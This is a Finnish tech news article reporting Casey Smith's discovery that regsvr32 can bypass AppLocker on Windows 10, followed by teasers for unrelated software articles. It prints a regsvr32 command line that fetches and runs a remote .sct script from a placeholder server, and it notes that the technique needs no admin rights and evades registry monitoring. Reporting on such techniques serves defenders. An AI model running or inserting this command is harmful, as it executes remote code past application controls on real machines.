Regsvr32: ta voidaan käyttää ohittamaan applocker Windows 10: ssä
Video: S01E22 - Configuring AppLocker Policies and Advanced Hunting - (I.T) 2024
Coloradon tutkija, nimeltä Casey Smith, on todennut, että Regsvr32: ta voidaan käyttää ohittamaan AppLocker Windows 10: ssä, ja tämä on suuri ongelma tietokoneen käyttäjille, etenkin liiketoimintaympäristön käyttäjille.
AppLocker esiteltiin ensimmäisen kerran Windows 7: ssä ja Windows Server 2008 R2: ssa. Sen tarkoituksena on antaa järjestelmänvalvojille mahdollisuus määrittää, mikä ryhmä tai käyttäjät voivat hyödyntää joitain tai kaikkia sovelluksia tiedostojen yksilöllisen identiteetin perusteella. Jos olet henkilö, jolla on taipumus käyttää AppLockeria, pitäisi olla yleisesti tiedossa, että sitä voidaan käyttää tiettyjen sääntöjen luomiseen, jotta sovellukset voivat suorittaa tai pysäyttää ne kappaleissaan.
Niille, jotka eivät ehkä tiedä, Regvr32: ta voidaan käyttää DLL-tiedostojen rekisteröintiin ja poistamiseen. Tämä ei ole yhden napsautuksen työkalu, koska se on komentoriviohjelma, joten vain edistyneiden tietokoneiden käyttäjien tulisi pyrkiä hyödyntämään tarjoamiaan mahdollisuuksia.
Ymmärrämme, että tätä tekniikkaa käyttämällä se ei muuta tietokonejärjestelmän rekisteriä, minkä vuoksi järjestelmänvalvojien on vaikea tietää, onko mitään muutoksia tehty.
regsvr32 / s / n / u /i:http://server/file.sct scrobj.dll
”Tässä on hämmästyttävää, että regsvr32 on jo proxy-tietoinen, käyttää TLS: ää, seuraa uudelleenohjauksia jne.… Ja… Arvasit allekirjoitetun, oletus-MS-binaarin. Joten sinun tarvitsee vain isännöidä your.sct-tiedostoasi hallitsemassasi paikassa ”, Smith kirjoitti.
Yllä oleva tekniikka ei vaadi järjestelmänvalvojan oikeuksia, eikä se muuta rekisteriä. Lisäksi skriptejä voidaan kutsua sekä HTTP: n että HTTPS: n kautta. Tällä hetkellä Microsoft ei ole julkaissut korjausta tähän pieneen ongelmaan, joten ainoa vaihtoehto tässä vaiheessa on estää Regsvr32 Windows-palomuurin kautta.
Kiinnostavaa kyllä, ohjelmisto jättiläisen ei ole vielä vastattu tähän käyttöjärjestelmän edessä olevaan turvallisuusongelmaan. Nyt kun se on ulkona, odotamme kuulevan jotain yrityksestä sekä keskusteluja tulevasta korjaustiedosta.
3 Hajautetut sähköpostiohjelmat, joita voidaan käyttää tai testata Windows 10: ssä
Sähköpostien yksityisyys on nykyään erittäin tärkeä asia. Raportit hakkeroiduista sähköpostitileistä tai vuotaneet salasanat ilmestyvät melkein joka päivä. Nämä sähköpostiturvaongelmat huomioon ottaen monet sähköpostin käyttäjät asensivat ylimääräisiä sähköpostiturvaohjelmistoja sähköisten viestiensä suojaamiseksi. Toiset mieluummin siirtyivät toiseen sähköpostiohjelmaan, jolla oli parempia arvosteluja…
10 Paras tiedostojen salausohjelma, jota voidaan käyttää Windows 10: ssä
Etsitkö tiedostojen salausohjelmistoa asennettavaksi Windows 10 -tietokoneeseesi? Lue tämä opas oppiaksesi mitä työkaluja voit käyttää.
5 Paras jääkiekon videoanalyysiohjelmisto, jota voidaan käyttää Windows 10: ssä
Jääkiekko on todella mielenkiintoinen ja vaativa peli. Tämä termi voi viitata kahteen erilaiseen peliin: kenttäkiekkoon tai jääkiekkoon. Peli on jatkuvasti kehittynyt, ja videokameroiden kehitystyön myötä jääkiekosta on kehitetty strateginen urheilu videon analysointiohjelmistoa käyttämällä. Yksityiskohtaisten tietojen taso, jonka voi saada…
